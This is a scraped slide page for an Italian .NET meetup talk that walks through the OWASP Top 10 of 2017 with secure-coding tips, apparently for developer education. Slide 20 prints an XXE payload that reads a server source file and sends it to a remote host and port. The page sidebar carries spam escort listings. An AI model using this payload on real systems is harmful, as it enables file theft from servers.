08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Hyundai Motor Group
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 

Recently uploaded (20)

Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 

Meetup DotNetCode Owasp

  • 1. DotNetCode.IT Microsoft .Net Coding Community www.dotnetcode.it MeetUp! #AperiTech
  • 2. DotNetCode.IT Microsoft .Net Coding Community OWASP: Security for .NET Developers (scrivere codice sicuro o almeno provarci) Benvenuti DotNetCode.IT Microsoft .Net Coding Community
  • 3. DotNetCode.IT Microsoft .Net Coding Community #AperiTech
  • 4. DotNetCode.IT Microsoft .Net Coding Community 21 Aprile 2018 - Global Azure Bootcamp bit.ly/gabrome18
  • 5. DotNetCode.IT Microsoft .Net Coding Community Speaker Software Architect Comdata Digital Fabio Mannis Email : fabio.mannis@outlook.com Linkedin : https://www.linkedin.com/in/fabiomannis/
  • 6. DotNetCode.IT Microsoft .Net Coding Community AGENDA • Cosa è OWASP • Quali sono i top 10 punti da tenere presente per sviluppare applicazioni web «sicure» • Casi d'uso ed alcuni esempi su come scrivere codice sicuro (o almeno provarci!)
  • 8. DotNetCode.IT Microsoft .Net Coding Community • The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here. • There are hundreds of issues that could affect the overall security of a web application • The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls and also provides developers with a list of requirements for secure development.
  • 9. DotNetCode.IT Microsoft .Net Coding Community OWASP Cheat Sheet Series
  • 10. DotNetCode.IT Microsoft .Net Coding Community Application Security Verification Standard (ASVS)
  • 11. DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
  • 12. DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection In an injection attack, instead of specifying data, the user is able to specify a command. This means that for applications which are vulnerable to injection attacks, hackers can in fact direct the system to perform an action which could lead to data exposure, loss of data integrity, and even data deletion.
  • 13. DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection • Sql Injection • Ldap Injection • Command Injection
  • 14. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
  • 15. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Password • Minumum lenght >=10 (or passphrases) • Maximun lenght 128 • Password complexity • Hashing • Secure Password Recovery Mechanism • No cookieless session • TLS!!!
  • 16. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Require re-authentication for Sensitive features (for mitigate CSRF or XSS attacks) • Authentication and Error Messages (generic manner) • Prevent Brute-Force Attacks • Built-in Session Management Implementations (Asp.net core identity) • Cookies • HttpOnly = true;
  • 17. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Cookies • HttpOnly = true; • Default expiration (default : only current browser session valid) • Secure = true; • Domain
  • 18. DotNetCode.IT Microsoft .Net Coding Community A3:2017- Sensitive Data Exposure Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser
  • 19. DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
  • 20. DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % stolendata SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml"> <!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://192.168.1.10:4444/?%stolendata;'>">
  • 21. DotNetCode.IT Microsoft .Net Coding Community A5:2017-Broken Access Control Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
  • 22. DotNetCode.IT Microsoft .Net Coding Community A6:2017-Security Misconfiguration Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion.
  • 23. DotNetCode.IT Microsoft .Net Coding Community A7:2017- Cross-Site Scripting (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 24. DotNetCode.IT Microsoft .Net Coding Community A8:2017- Insecure Deserialization Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
  • 25. DotNetCode.IT Microsoft .Net Coding Community A9:2017-Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
  • 26. DotNetCode.IT Microsoft .Net Coding Community A10:2017- Insufficient Logging & Monitoring Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
  • 28. DotNetCode.IT Microsoft .Net Coding Community DotNetCode.IT Microsoft .Net Coding Community
  • 29. DotNetCode.IT Microsoft .Net Coding Community Prossimo Evento Leonardo D’Ottavi Data: 18/05/2018
  • 30. DotNetCode.IT Microsoft .Net Coding Community Global Azure Bootcamp 2018 bit.ly/gabrome18
  • 31. DotNetCode.IT Microsoft .Net Coding Community Selfie Lottery www.dotnetcode.it http://bit.ly/sldnc20180418
  • 32. DotNetCode.IT Microsoft .Net Coding Community Grazie a Tutti! DotNetCode.IT Microsoft .Net Coding Community
  • 33. DotNetCode.IT Microsoft .Net Coding Community Follow US! www.dotnetcode.it https://www.facebook.com/DotNetCode.IT https://twitter.com/DotNetCodeIT https://plus.google.com/+DotnetcodeIt